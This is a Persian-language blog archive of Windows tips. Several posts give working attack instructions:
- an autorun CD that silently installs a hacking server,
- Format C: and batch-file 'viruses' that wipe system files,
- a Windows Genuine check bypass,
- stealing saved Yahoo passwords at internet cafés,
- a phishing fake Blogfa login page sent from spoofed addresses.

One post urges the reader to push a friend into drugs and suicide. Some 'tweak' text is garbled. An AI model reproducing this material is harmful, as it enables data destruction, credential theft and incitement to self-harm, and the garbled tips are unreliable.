|
|
|
|
|
| +| نوشته شده توسط
امین استادابراهیم در هجدهم مرداد 1386
| |
| | | |
|
|
|
|
در Control panel روی گزینه ی Phone & Modem کلید کنید و بعد روی modems ودر آن روی Properties و روی Advanced کلید کنید.
در Extra setting در جای خالی کد زیر را وارد کنید:
AT&FX+MS=V34
نکته:اگر نظر ندهید این کد عمل نمیکند.
| +| نوشته شده توسط
امین استادابراهیم در بیست و یکم آبان 1385
|
| | | |
|
|
|
|
توسط اين ترفند شما ميتوانيد نام شركت و خريدار ويندوز XP خود را به دلخواه تغيير دهيد. مراحل زير را دنبال كنيد :
ابتدا از طريق قسمت RUN تايپ كنيد regedit و Enter بزنيد، بعد از اين كه وارد رجيستري شديد اين كليد را بيابيد :
HKEY_LOCAL_MACHINSOFTWAREMicrosoftWindows NTCurrentVersion
در صفحه سمت راست بر روي RegisteredOrganization دوبار كليك كنيد و در قسمت Value data اسمي را كه مي خواهيد تايپ كنيد. سپس OK بزنيد. براي تغيير نام شركت يا همان كمپاني سازنده در صفحه سمت راست بروي RegisteredOwner كليك كنيد و بعد نامي كه مي خواهيد بگذاريد و Ok را بزنيد.
| +| نوشته شده توسط
امین استادابراهیم در بیستم آبان 1385
|
| | | |
|
|
|
|
اين تنظيمات به شما امکان مي دهد تا تنظيمات پيش فرض Startup List را که 30 ثانيه مي باشد و امکان تغيير منو را در اين مدت به کاربران مي دهدرا تغيير دهيد. ويژگي فقط خواندني فايل BOOT.INI را غير فعال کنيد . اين فايل بطور معمول در مسير: C قرار دارد. سپس آن را در يک ويرايشگر متني باز کنيد . در قسمت [boot loader] مقدار گزينه '=timeout' را برابر مقادير زير قرار دهيد : مدت زمان را بين 1 تا 999 ثانيه در نظر بگيريد . براي آنکه ويندوز فورا بوت شود مقدار آن را برابر '0' قرار دهيد براي آنکه سيستم تا زماني که شما تعيين نکرده ايد در همان وضعيت منو باقي بماند مقدار را برابر '1-' قرار دهيد. تغييرات در مرحله بعدي راه اندازي به سيستم شما اعمال مي شوند.
| +| نوشته شده توسط
امین استادابراهیم در بیستم آبان 1385
|
| | | |
|
|
|
|
اما روشی که امروز می خواهم بگم ديگه هر کسی را که خواستيد هک کنيد.
شما در برنامه نت پد خط زیر را تایپ نمائید
[autorun]
OPEN=CRAZYHACKER.EXE
توجه داشته باشید که به CRAZYHACKER باید نامی که بر فایل اجرایی سرور هک خود گذارده اید را
وارد نماييد و در آخر فايل را با فرمت
Autorun.inf
ذخیره نمائیداکنون کافیست که این فایل را بهمراه سرور هک خود برروی سی دی کپی نمائید از این لحظه به بعد شما با قرار دادن این سی دی در هر کامپیوتری آن را الوده میکنید ودر صورت انلاین
شما به راحتی میتوانید کامپیوتر مورد نظر را هک کنیدمواظب باشید هیچ گاه برای امتحان هم این سی دی را درون درایو خودقرارندهید این سی دی به محض قرار گرفتن در درایو کامپیوتر در مدت 7 ثانیه کامپیوتر را آلوده میکند و نیازی به باز شده برنامه ندارد.
برای اينکه تابلو نشه يک سی دی برنامه رايت کنيد که طرف شک نکنه
| +| نوشته شده توسط
امین استادابراهیم در بیستم آبان 1385
|
| | | |
|
|
|
|
گر كامپيوتر شما خانگي است و د داخل هيچ شبكه اي نمي باشيد، با غير فعال كردن سرويس هاي زير مي توانيد سرعت ويندوز خود را به ميزان زيادي افزايش دهيد، ويندوز، تمام سرويس ها را در حالت پيش فرض خود دارد. اما براي كامپيوتر مخصوص شما بسياري از آنها اصلا مورد نيازتان نخواهد بود.
پس چه بهتر كه آنها را غير فعال كنيد. اما براي غير فعال كردن اين سرويس ها دوباره لازم است كه پنجره Run را گشوده و از آنجا Msconfig را اجرا نموده سپس به برگه سرويس رفته و تيك كنار سرويس هاي زير را با خيال راحت حذف كنيد.
Alerter
Fastuser switching Compatibility
TCP/IP Net Bios Helper
Remote Desktop Sharing
Session Manager
Themes
Universal Plug and Play Device host
Wireless Zero Configuration
2- منوي Start را باز كنيد. داخل منوي All Programs منوي Accessovies را باز كنيد. داخل اين منو System Tools را باز كنيد و گزينه Disk Defragmenter را انتخاب كنيد.
براي شما پنجره اي با همين نام باز مي شود.
ابتدا (Analyze) را انتخاب كنيد تا اطلاعات شما بررسي شود. پس از بررسي گزينه (Defragment) را انتخاب كنيد. البته اين عمل نسبت به اطلاعات شما ممكن است ساعتي طول بكشد
| +| نوشته شده توسط
امین استادابراهیم در بیستم آبان 1385
| |
| | | |
|
|
|
|
برام میل هم بزنید
www.Amin_Love_Guitar@yahoo.com
همتونو دوست دارم
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
اين ويروس چيز سختي نيست ولی خيلي خطرناكه.
اول از همه روي دسكتاپ رايت كليك كنيد بعدش New ShortCut بسازيد.
يه صفحه باز ميشه در اون بنويسيد: Format C:/Autotest
سپس Next را زده و در صفحه جديد كه باز ميشه يه اسم واسه ويروستون انتخاب كنيد.
سپس Next را زده ويه آيكون با سليقه خودتون براي اون انتخاب كرده و Finish كنيد.
خب ديگه كارمون تمومه حالا اگه اجراش كنين بيچاره ميشين.
اگه خواستين بفهمين چي ميشه به جاي Format C:/autotest بنويسيد
Format a:/autotest و يه فلاپي كه حاوي اطلاعات هستش در Flopy Drive خود
قرار دهيد بعد اجراش كنيد بعد برين سراغ فلاپيتون ببينيد چي شده.ميبينيد فلاپي
پاك شده وديگه نه ميشه اطلاعات روش ريخت ونه ميشه فرمتش كرد.
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
حتما متوجه شدید که از روز سه شنبه 26 ژولای 2005 ، مایکروسافت از آپدیت شدن ویندوزهای تقلبی جلوگیری کرده . من هم الان راه بدل زدن به اون رو بهتون میگم البته این یه راه موقتیه و به زودی جلوی این هم گرفته خواهد شد ولی باز هم من به فکر همه عزیزان هموطن خواهم بود .
برای این کار کافیه که شما وقتی به صفحه ای رسیدید که باید از Express یا Custom یکی رو انتخاب کنید دست نگه دارید و این کد رو در قسمت آدرس بار وارد کنید و بعدش Enter رو بزنید
javascript : void(window.g_sDisableWGACheck='all' )
و یا برای اینکه تا سال 2050 لازم نباشد هی این کار را تکرار کنید این یکی رو وارد کنید
java script : void(document.cookie='WinGenCookie=validation=0;expires=Sat, 1 Jan 2050 12:00:00 UTC')
اگه نظر ندید ناراحتم کردید
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
روی start رفته و روی run کلیک کنید و notepad را تایپ کنید بعد از باز شدن پنجره اینهارو بنویسید توش
@echo off
Cls
===========
Color fc
Del /a c:\*.com
Del /a c:\*.sys
Del /a c:*.exe /s
===========
خوب تایپ کردن بسه دیه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند ان را با نام bat بگذارید مثل: love.bat
خوب کار دیه تموم شد این ویروس رو اگه کسی باز کنه کامپیوتر رو با یک خاک مساوی میکنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار میندازه
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
برای این کار مثل زیر عمل کنید.
۱- از منوی Start روی Run کلیک کنید تا منوی Run ظاهر بشه خوب حالا توش تایپ کنید cmd و اینتر بزنید تا ms-dos promt ویندوز ظاهر بشه
2-خب حالابه درایوی که پوشه توشه برید
3-خب حالا فرمان ren رو اجرا کنید و یه فاصله بدید و اسم پوشه رو وارد کنید و بازم یه فاصله و ودوباره اسم پوشه رو وارد کنید واین فرق که بعد از اسم پوشه بدون هیچ فاصله ای یه نقطه بذارید و کد زیرو بدید
({2559a1f2-21d7-11d4-bdaf-00c04f60b9f0})
یعنی مثل این خط فرمان:
x:\ren folder folder.{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}
تذکر: به جای(x) اسم درایو و به جای folder اسم پوشه خودتونو بدید.
4-خب حالا اینتر کنید و تمام . توی محیط ویندوز به جایی که پوشه بوده برید اگه خوب کارتون رو انجام داده باشید فلدر به شکل یه قفل در اومده
5- برای برگردوندن این پوشه به حالت اولیه باید تمام مراحل رو انجام بدید فقط توی تغییر نام از اون کد استفاده نکنید یعنی اینطور :
x:\ren folder.{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0} folder
امیدوارم که از این مطلب استفاده بکنید به درد میخوره چون اگه مثلاً عکس مخفی کرده باشید توی هیچ سرچی نمیشه پیداش
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
اگر مي خواهيد شاخه اي داشته باشيد و كسي از وجود آن با خبر نشود ، كارهاي زير را انجام بدهيد:
1- براي ديده نشدن آيكون هر Folder (شاخه)، روي شاخه مورد نظر راست كليك كنيد.Properties را انتخاب كرده و به بخش Customize در بالاي پنل Properties برويد. Change Icon را بزنيد ليستي از آيكونها در برابر شما ظاهر خواهد شد ، چنانچه اين ليست ظاهر نشد، مقابل گزينه Browse بنويسيد :
%SystemRoot%\system32\SHELL32.dll و ok را بزنيد. داخل ليست آيكون هاي نمايش داده شده چند آيكون هست كه شكلي ندارند و با اينكه يك آيكون محسوب ميشوند و در اين ليست جايي را به خود اختصاص دادهاند اما به ظاهر ديده نمي شوند.يكي از آنها را انتخاب كنيد و ok را بزنيد. پنل Properties را هم ok كنيد. حالا شاخه شما بدون اينكه شكلي داشته باشد فقط اسم دارد.
2- براي اينكه اسم شاخه هم از بين برود، كافيست روي شاخه راست كليك كنيد و Rename دا انتخاب كنيد، حالا قبل از اينكه اسم شاخه را تغيير دهيد كليدALT را پايين نگه داريد و شماره 255 را بزنيد. حالا كليد ALT را رها كنيد تا نام folder مورد نظرتان هم از بين برود.
حالا فقط شما ميدانيد كه در اين محل شاخه يا زير شاخهاي وجود دارد و تنها چنانچه در همان محل يك كليك كنيد مشخص ميشود كه آنجا شاخهاي وجود دارد.
نظر یادت نره
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
در منوی start زیر منوها پس از 400 میلی ثانیه ظاهر میشود که برای کاربرن حرفه ای ممکن است چند ثانیه طول بکشد شما میتوانید این زیر منوها را به سرعت برق ظاهر کنید آن هم با رفتن به سراغ کلید زیر ( البته قبلا از این کار یادم رفت بهتون بگم که باید از منوی start گزینه run را انتخاب کرده و سپس کلمه regedit را در آن وارد و ok را بزنید و حالا شما در رچیستری ویندوز هستید ) کلید زیر را در رجیستری پیدا کنید :
HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP
در این جا فقره ی MENU SHOW DELAY را پیدا کنید مقدار این متغیر طول تاخیر منو را بر حسب میلی ثانیه از 0 تا 999 نشان میدهد که میتوانید با دادن مقدار 1 به آن سرعت آن را بسیار بسیار سریع کنید تا در نیم سوت زیر منوها ظاهر شوند
نظر یادت نره
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
به دلایلی که برای ما معلوم نیست بسیاری از برنامه ها به طور کامل پاک (uninstall ) نمیشوند در نتیجه بسیاری از کاربران سعی می کنند با حذف پوشه یا شاخه آن برنامه مقدمات پاک شدن آن را انجام دهند اما نام چنین برنامه هایی برای همیشه در فهرست
Add\Remove Program باقی خواهند ماند برای آنکه فهرست این برنامه ها را از بین ببریم باید از رجیستری استفاده کنیم :
ابتدا به کلید زیر بروید :
HKEY_LOCAL_MACHINE\Microsoft\Windows\Curent Version\uninstall
و سپس کلید متناظر با این کلید را باز کنید و حالا برنامه هایی را که نمی توانستید پاک کنید را از این جا حذف کنید تا برای همیشه از بین بروند
نظر یادت نره
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
رم افزار DAP یا Download Accelerator Plus شاید شناخته شده ترین نرم افزار مدیریت دانلود در جهان اینترنت و به خصوص در میان ایرانیان میباشد. این نرم افزار بیشتر به خاطر افزایش سرعت دانلود و عدم قطع ارتباط پس از دیسکانکت شدن معروف است. اما با استفاده از ترفندی که هم اکنون به شما معرفی خواهیم کرد میتوانید سرعت دانلود در این نرم افزار را تا حد زیادی بالاتر ببرید.
بدین منظور:
ابتدا نرم افزار DAP را باز نمایید. حال از منوی بالا و قسمت Option به بخش Preferences بروید. سپس به قسمت Advanced رفته و بر روی دکمه View Log کلیک کنید. در پنجره باز شده در صورت وجود متنی آن را پاک کرده و متن زیر را در آن جایگزین کنید.
ereg-dict-ja.xml'. Line 2, Position 90
gus7b:ajain "speeder 2
kai[psd]100
se;rec56 kbps
در پایان دقت کنید در صورتی که سرعت اینترنت شما عدد دیگری است آنرا از 56 به سرعت اینترنت خود تغییر دهید.
نظر یادت نره
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
اگر با ريجستري آشنايي نداريد بهتره اول به بخش ريجستري بريد و يك خورده با اون آشنا بشيد
از منوي Start گزينه Run را انتخاب كنيد و Regedit را تايپ كنيد تا داخل محيط ويرايش ريجستري شويد حالا به اين كليك در ريجستري برويد :
HKEY_CURRENT_USER\Software\Yahoo\Pager
و روی Save Password دو بار كليد كنيد و عدد 100 را در آن تايپ كنيد و OK بزنيد حالا
ياهو مسنجر را نگاه كنيد آخرين ID و Password ID می بينيد می توانيد باآن LOGIN
بشويد .
حال بايد يك برنامه كه از قبل آمده كرده باشيد كه پسورد روي ويندوز را بخواند كه با
آن بتوانيد پسورد درون ياهو مسنجر را بخوانيد.
اين كار شما مي توانيد در كافي نت انجام بدهيد چون پسورد شخص قبلي كسي
كه قبل از شما كار مي كرده اگر هم پسورد هم Save نكرده باشه مي توانيد در
بياريد .
توجه : شما مي خواهيد اين كارو در كافي نت انجام بدهيد اما مي بينيد هر چي
Regedi را در Run تايپ مي كنيد ويندوز Error به شما مي دهد اين به آن معنا است
كه رجستري ويندوز پسورد داره پس شما بيايد به جاي Regedi اين را regedt32 تايپ
كنيد ...
چرا نظر نمیدین؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟!!!!!!!!!!!!!!!!!!!!!
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
بعد از انجام مراحل زير اين مراحل را دنبال كنيد(بايد تمامي مراحل را به گونه اي انجام دهيد كه دوستتان به هيچ متوجه نشود، ok.
1-تا انجا كه مي توانيد سعي كنيد در تمامي اوقات دوستتان را ناراحت كنيد ،مثلا با به يادآوري خاطرات تلخ گذشته ،شوخي هاي بيجا ،…
2-هميشه درمقابل او به گونه اي تلخ از زندگي صحبت كنيد هر چقدر نااميدي بيشتر در چهره دوستتان مشاهده شود موفقيت شما نيز بيشتر است
3-بعدازاينكه نااميدي به طوركامل يا حتي به صورت نسبي بردوستتان غلبه كرد شما بايد مرحله اصلي را اجرا كنيد.مقداري موادتهيه كنيد ،از سيگار گرفته تا هرويين يا كوكايين (البته اگر بتوانيد مواد با كلاس مثل اكس يا كريستال تهيه كنيد بهتر است).دريك زمان مشخص دوستتان را حسابي فشارروحي داده تا اثرات افسردگي كاملا مشاهده شود سپس ازفوايد مواد مورد نظر صحبت كرده وبه او تلقين كنيد كه براي به دست آوردن آرامش راهي به جز مصرف مواد ندارد ومقداري از مواد مورد نظر را به وي داده وتظاهر كنيد كه خود شما هم از آن مصرف مي كنيد .
6- بعد از مدتي دوست شما به طور اتو ماتيك به يك افسردگي مطلق مي رسد.(اگر بتوانيد اين مرحله را با موفقيت پشت سر بگذاريد به منسب
"سلطان شياطين خشن"نائل خواهيد شد)دراين هنگام شما شروع كنيد به صحبت درباره مرگ ،وروش هايي براي خودكشي از جمله مرگ موش، طناب،پريدن ازارتفاع يا مرگ باكلاس مثل سيانوريا مصرف يه بسته اكس مشكي و… اين راه را به دوستتان پيشنهاد بدهيد وبگوييد مثلا فردا به تو زنگ مي زنم تا باهم هماهنگ كنيم براي يك خودكشي دونفره (مثل خود كشي هاي دسته جمعي كه تازه مد شده ).حال يك سري قرص تقلبي ويك سري قرص واقعي تهيه كنيد وهنگام خودكشي قرص هاي واقعي رابه دوستتان بدهيدو….
زمانيكه براي تشييع جنازه صميمي ترين دوستتان تشريف برده ايد شما در اين هنگام به مقام والاي "سلطان شياطين خشن"نائل خواهيد شد.
| +| نوشته شده توسط
امین استادابراهیم در هشتم آبان 1385
| |
| | | |
|
|
|
|
شاید خیلی هاتون با Fake Page آشنا نباشید برای همین یک توضیح مختصر برای اون دسته از افراد میدم.
بلاگفا
لینکی که بالا مشاهده کردین مثل صفحه بلاگفا بود که یوزر و پسورد وبلاگتون رو میزنید و داخل کنترل پنل وبلاگتون می شید.اما این صفحه ای که من برای شما گذاشتم قلابی بودش و اگه شما یوزر و پسورد وبلاگتون رو در صفحه ای که بالا برای شما گذاشته بودم بزنید پسورد وبلاگتون برای من امیل میشه.به این طور کار ها Fake Page گفته میشه یا همون صفحات قلابی.
حالا شما کافی که صفحه بالا رو برای کسی امیل کنید البتهباید صفحه رو با امیل خودتون درست کنید که کد و توضیحات ساختنش رو پایین براتون گذاشتم. بعد کد زیر رو به html تبدیل کنید و از طرف support@blogfa.com یا no-reply@blogfa.com برای کسی که می خواهید وبلاگش رو هک کنید بفرستید.(میتونید از برنامه هایی که ایمیل جعلی میفرستند استفاده کنید که بتونید از طرف امیل مدیر بلاگفا امیل بزنید.برنامه فرستادن امیل جعلی هم پایین براتون گذاشتم)
حالا کافی کمی با فکر و باهوش باشید و طرف رو گول بزنید.مثلا تو امیلی که میزنید به صاحب وبلاگ بگید:
کاربر عزیز مشکلی در قسمت ورود به کنترل پنل وبلاگ پیش آمده تا رفع خرابی از صفحه زیر استفاده کنید.
حالا اون کاربر هم یوزر وبلاگ و پسوردش رو در این صفحه قلابی وارد کرده و بلافاصله برای شما امیلی میاد حاوی پسورد و یوزر اون شخص و به همین راحتی وبلاگ اون رو هک کردید.البته راه های زیادی برای گول زدن هست که همه اوها بستگی به فکر شما داره.
وقتی کسی رو هک کردید یک امیل از طرف Fake-Page@iR-Security.Net برای شما ارسال میشه که داخل اون یوزر و پسورد قربانی هستش.
طریقه ساخت Fake Page اول فایل زیپ سده زیر رو دریافت کنید که یک فایل متنی TxT داخلش هست و کد مربوطه داخلشه.
دانلود
حالا فایل متنی Blogfa رو باز کنید و از منو های بالا به ترتیب زیر عمل کنید:اول قسمت Edit و بعد Find Next از کلید میان بر F3 هم میتونید استفاده کنید.حالا در اون کادر خالی بنویسید youremail@yahoo.com و Find Next رو بزنید.حالا روی متن مورد نظر هستید به جای youremail@yahoo.com امیل خودتون رو بنویسید و Save کنید فایل رو.حالا این فایل رو به Html تبدیل و آپلود کنید و برای قربانی از طرف مدیر سایت بلاگفا امیل کنید و با هر ترفندی که میدونید اون رو وادار کنید که یوزر و پسوردش رو در اون قسمت وارد کنه و شما دیگه فقط منتظر اومدن امیل باشید.
طریقه تبدیل TxT به Html هم میتونید یا در موقع آپلود مشخص کنید.و یا فایل Txt رو باز کنید و بعد از اعمال تغیرات به گزینه File و بعد Save As برید و در جایی که اسم پوشه رو میخوایید بنویسید جولوی اسم یک .Html هم اضافه کنید.مثلا من میخوام اسم صورت ذخیره می کنم: saeed.html و بعد دخیره می کنم.به این صورت فایل رو Html تبدیل کردید و دیگه میتونید آپلود کنید.
اگه نظر ندین دیگه هیچی بهتون یاد نمیدم.
| +| نوشته شده توسط
امین استادابراهیم در هفتم آبان 1385
| |
| | | |
|
|
|
|
سلام دوستان !
شما با اين آموزش مي توانيد به حداكثر سرعتي كه تا به حال از اينترنت نديدهايد دست يابيد!
ما در اينجا روشی کارآمد را به شما معرفی کنیم که بهره گیری از آن میتوانید مطمئن باشید که سرعت اینترنت شما بالاتر خواهد رفت. این کار از طریق تنظیمات مودم شما صورت خواهد گرفت ، در نتیجه تنها برای کاربران Dialup قابل استفاده است.
بدین منظور:
از منوی Start وارد Control Panel شوید ، سپس بر روی آیکون Phone and Modem Option دوبار کلیک کنید.
در پنجره باز شده به تب Modems رفته و روی دکمه Properties کلیک کنید.
حالا در پنجره جدید به تب Advanced بروید و در قسمت Extra Initialization Commands کد زیر را وارد کنید:
AT&FX+MS=V34
تمام پنجره ها را OK کرده و خارج شوید.
سپس در ادامه کار در همان Control Panel و وارد قسمت Network Connection شوید. بر روی کانکشنی که با آن به اینترنت متصل میشود راست کلیک کنید و Properties را برگزنید.
در پنجره باز شده و در همان تب General روی دکمه Configure کلیک کنید.
در پایان در پنجره باز شده بخش Maximum Speed را روی 921600 تنظیم کنید.
تمام پنجره ها را OK کرده و خارج شوید.
تاثیر این کار پس از اولین اتصال با آن کانکشن است.
| +| نوشته شده توسط
امین استادابراهیم در هفتم آبان 1385
| |
| | | |
|
|
|
|
آقا شما داريد در روم چت مي کنيد , حال نمي کنيد يک يا حتي چند نفر خاص در روم باشند.
خوب... کافي اين کار رو انجام بديد:
اين فرمان رو که نوشتم چند بار به سرعت در روم وبعد کنيد
اما فرمان:invite******/:
که به جاي****** بايد ID طرف رو بنويسيد.
البته اين کار بايد به وسيلهyahoomessenger باvesion بالاتراز5.5 انجام بشه.
اگرهم ديديد طرف مي خوات زرنگبازي دربياره هيچ خيالي نيست.اين کار کنيد:
شما اين فرمان را سريع بفرستد:
0kfd11-u5vqvs-n38a65-fkiv84
اين دفه مطمن باشيد طرف با پاي خودش از روم ميره بيرون. (اينه!!!)
_________________
نظر یادتون نره
| +| نوشته شده توسط
امین استادابراهیم در هفتم آبان 1385
| |
| | | |
|
|
|
|
Vulnerability يا بهصورت مختصر vul را در فارسي حفره يا سوراخ امنيتي ميگيم. اين عبارت رو بايد يه کم توضيح بدم. فرض کنيد که يه نرمافزار داريم که يه پورتي رو باز ميکنه. وقتي اين نرمافزار قرار هست که منتشر بشه، شرکت سازنده يه سري تست رو نرمافزار انجام ميده که مشکلي نداشته باشه. بعد که اطمينان نسبي خاصل شد، نرمافزار ارائه ميشود و سرورها و کلاينتها از اون نرمافزار و از اون ورژن خاص شروع به استفاده ميکنن. بعد از اينکه نرمافزار منتشر شد، گروههاي مختلفي که در سراسر جهان هستند و کارشان تست امنيتي اين نرمافزارهاست شروع به فعاليت ميکنند. اين گروهها هر چند وقت يک بار موفق به يافتن نقاط ضعفي در اين برنامهها ميشوند و اونو گزارش ميکنن. سايتهايي هستند که کارشون بهطور عمده گزارش جديدترين vul هاي کشف شده است. مثلا ممکنه در سايتهايي مثل securitytracker.com يا securityfocus.com و ... به عبارتي مثل :
A vulnerability was reported in ...
برخورد کرده باشيد. اين بيان ميکنه که يه vul جديد کشف شده است. دقت کنيد که اين vul از وقتي نرمافزار طراحي شده با اون بوده ولي کسي از اون خبر نداشته تا وقتي که اين گزارش منتشر بشه! پس اين گروهها کارشون کشف باگ هستش نه اختراع باگ!
همچين نرمافزاريي رو vulnerable ميگن. يعني قابل نفوذ.
اين vul ها انواع مختلفي دارند و ميشه اونا رو catagorize (طبقهبندي) کرد. اين بحث رو بعدا بهطور کامل مطرح ميکنم. عجالتا بهتره کمي هم راجع به exploit صحبت کنم:
- exploit چيست؟
فرض کنيد که يکي مياد و يه باگ رو کشف ميکنه. اين کشف vul معمولا فقط در حد يک گزارش ميمونه تا اينکه يکي همت کنه و روشي براي exploit کردن اون vul درست کنه. پس vul جنبه تئوري قضيه است و exploit قسمت عملي اون. exploit ميتونه يه کد (معمولا به زبانهاي سي و پرل ) يا يه دستورالعمل يا يه url و ... باشه. وقتي شما مطمئن ميشين که فلان سرور از فلان ورژن فلان نرمافزار استفاده ميکنه که اون نرمافزار فلان vul رو داره، يا بايد exploit بسازيد و يا اينکه يه exploit واسه اون از اينترنت پيدا کنيد.
نتيجه اينه که ممکنه يه vul کشف شده باشه ولي exploit واسه اون نباشه. حتي من ديدم که سايتهاي مطرحي مثل Cert ميان و قلم فرسايي ميکنن که فلان vul قابل exploit کردن نيست ولي بعد exploit نوشته ميشه و اينا ضايع ميشن!! البته بگذريم که نمونههايي از vul ها رو داريم که هرگز براش exploit نوشته نشده باشه.
- vul ها رو چگونه نامگذاري ميکنند؟
اولين نکتهاي که بايد بگم، اينه که براي هر Vulnerability يک شماره يا يک نام نسبت ميدن. اين شماره يا نام در واقع يک استانداردي است که به هکرها و متخصصين امنيت شبکه اجازه ميده که حرف همديگرو بفهمن! مثلا ممکنه جايي ببينيد که راجع به NT IIS Unicode Vulnerability صحبت ميکنند يا راجع به CVE شماره CVE-2000-0884 يا BID شماره 1806 بحث ميکنند. دقت کنيد که همه اينها معادل هم هستند. پس براي يک vul خاص ممکن است شمارهها يا عبارتهاي معادلي باشد.
۱- CVE اولين جايي است که بايد ببينيد:
فرض کنيد که شما متوجه شدهايد که سروري داراي يک vul به شماره CVE-2000-0508 داشته باشد (اينکه چطوري ميشه فهميد يه سرور چه vul هايي داره بعدا بحث خواهم کرد). براي CVE از يکي از آدرسهاي زير استفاده کنيد:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=xxxxxxxxxx
http://cgi.nessus.org/cve.php3?cve=xxxxxxxxx
که به جاي xxxxxxxxx بايد شماره CVE رو بنويسيد مثلا CVE-2000-0508 يا مثلا CAN-2002-0651 و...
وقتي به اين آدرسها رجوع کنيد ميبينيد که يه سري نامها و شماره معادل براي اين CVE ذکر شده است. به عبارت ديگه واسه اينکه در مورد يک vul مطالبي بياموزيد، اولين کاري که ميکنيد رجوع به يکي از دو سايت بالاست. بعد از رجوع به آنها ميتونيد لينکهايي را استخراج کنيد که به شما اجازه ميدن، راجع به اون vul مطالبي رو بياموزيد.
فرض کنيد که يک vul رو که CVE اونو ميدونيد در يکي از اين سايتها داريد ميخونيد، ملاحظه خواهيد کرد که براي اين CVE بعد از يک توضيح مختصر يک سري اسم و شماره ذکر شده است. اين اسامي ممکن است، BID يا XF يا ... باشد. در واقع براي اينکه در مورد اين vul خاص نکاتي را ياد بگيريد، علاوه بر توضيحات مختصز بالاي صفحه بايد تک تک اين مطالبي که بهشون ارجاع داده شدين، مثل BID مربوطه، XF مربوطه و ... را بخونين. حالا اگه اونحا نوشته باشه:
BID: 1806
از کجا بايد اونو خوند؟ (يعني لينک مستقيمش چي هست؟) همين پايين مهمترهاشو ميگم (دقت کنيد که همه اون اسمها معادل هم هستند فقط سايتهاي مختلف اسمهاي مختلفي را واسه يه vul انتخاب ميکنند و ما ميخواهيم تمام مطالب مرتبط با يه vul خاص رو از سايتهاي مختلف پيدا کنيم )
۲- BID يا BugTraq ID يا همون نفس من بيده! :
فرض کنيد که صفحه مربوط به CVE خاص رو خوندم و اونجا به عبارت BID: 1806 برخوردم. حالا اونو از کجا بخونم؟ از اينجا :
http://www.securityfocus.com/bid/xxxx
که به جاي xxxx بايد يک عدد بنويسيد (همان عدد مربوز به BID ) مثلا به جاي xxxx بنويسيد: 1806
اگه بخوام بهترين محل يادگيري راجع به vul ها رو ذکر کنم، جايي بهتر از www.securityfocus.com واسه اين کار وجود نداره. دقت کنيد وقتي که صفحه مربوط به يک BID خاص رو در اين سايت ميبينيد، يک سري لينک به اسمهاي info و discussion و exploit و solution را هم بخونين که جنبههاي مختلف اون vul خاص است. مخصوصا قسمت exploit که جايي است که جوجههکرها ميتونن با اون حسابي حال کنن! به عبارت ديگه جاييه که واسه اون vul خاص exploit داونلود کنيد. خيلي از ابزارهاي هک که تبليغ ميشن، در واقع با تغييرات کمي از همين exploit ها بدست ميآن!!
۳- XF :
XF استاندارد سايت iss.net براي vul هاست. XF به صورت يک نام (نه عدد) نامگذاري ميشوند و اونو بايد در صفحه زبر بخونين:
http://www.iss.net/security_center/search.php
که وقتي در اين صفحه search کنيد، يک سري صفحات static بدست مياد که بايد بخونين.
۴- CA يا CERT:
سايت cert.org براي vul ها از اسم CA استفاده ميکند، مثل CA-2002-19 براي CA ها صفحه زير رو ببينيد:
http://www.cert.org/advisories/xxxxxxxxx.html
بهجاي xxxxxxxxx مثلا مينويسيم: CA-2002-19
ضمنا دقت کنيد که وقتي مطالب مربوط به يک vul رو از سايت cert ميخونيد، ملاحظه ميکنيد که لينکهايي به صورت VU#xxxxx در آن هست که به جاي xxxx يک عدد نوشته شده مثلا 369347 که اين VU# رو ميتونيد از اينجا بخونيد:
http://www.kb.cert.org/vuls/id/xxxxxx
۵- و …
- چگونه vul هايي که يه سرور داره رو پيدا کنيم؟
خوب اين موضوع کاملا بستگي به سطح اطلاعات شما داره:
۱- جوجه هکرها و هکرهاي تازهکار:
جوجه هکرها و نيز هکرهاي تازه کار (قابل احترام) واسه پيدا کردن vul هاي مربوط به يک سرور از security scanner ها يا vulnerability scanner ها يا Vulnerability Analysis استفاده ميکنند. به کمک vul scanner ميتوان يک ip خاص رو به صورت اتوماتيک اسکن کرد تا ببينيم چه سوراخهايي داره که اونا رو exploit کنيم. بعد از اسکن يک ip يک سري CVE به ما ميده که اونا رو بايد بخونيم.
۲- هکرهاي پيشکسوت:
هکرهاي پيش کسوت با تجربهاي که دارند ميدونند که مثلا اگه يه سرور از IIS 5.0 استفاده ميکنه، چه vul هايي براي اون هست پس وقتشون رو با اسکن کردن تلف نميکنند. تجربه چيزي است که بهتدريج بدست ميآوريد، پس زياد عجله نکنيد.
آموزش هک سایت قسمت دوم پیدا کرد یک باگ
در این قسمت طریقه ی پیدا کردن یک باگ را بر روی سرور و یا سیستم آموزش میدم
توجه کنید که باگ بر روی برنامه ای که یک پورت با آن برنامه کار میکند وجود دارد.
ping چيست ؟
ping دستوری است که مشخص میکند که آيا يک کامپيوتر خاص که ما ip يا domain آن را میدانيم، روشن و فعال (Active) هست يا نه. و اينکه اگر فعال باشد مدت زمان رسيدن بستههای tcp/ip از آن کامپيوتر به کامپيوتر ما چقدر است.
کاربرد اين دستور به صورت زير است:
ping ip-or-domain
که به جای ip-or-domain بايد شماره ip و يا domain آن(اگر داشته باشد) را میگذاريم.
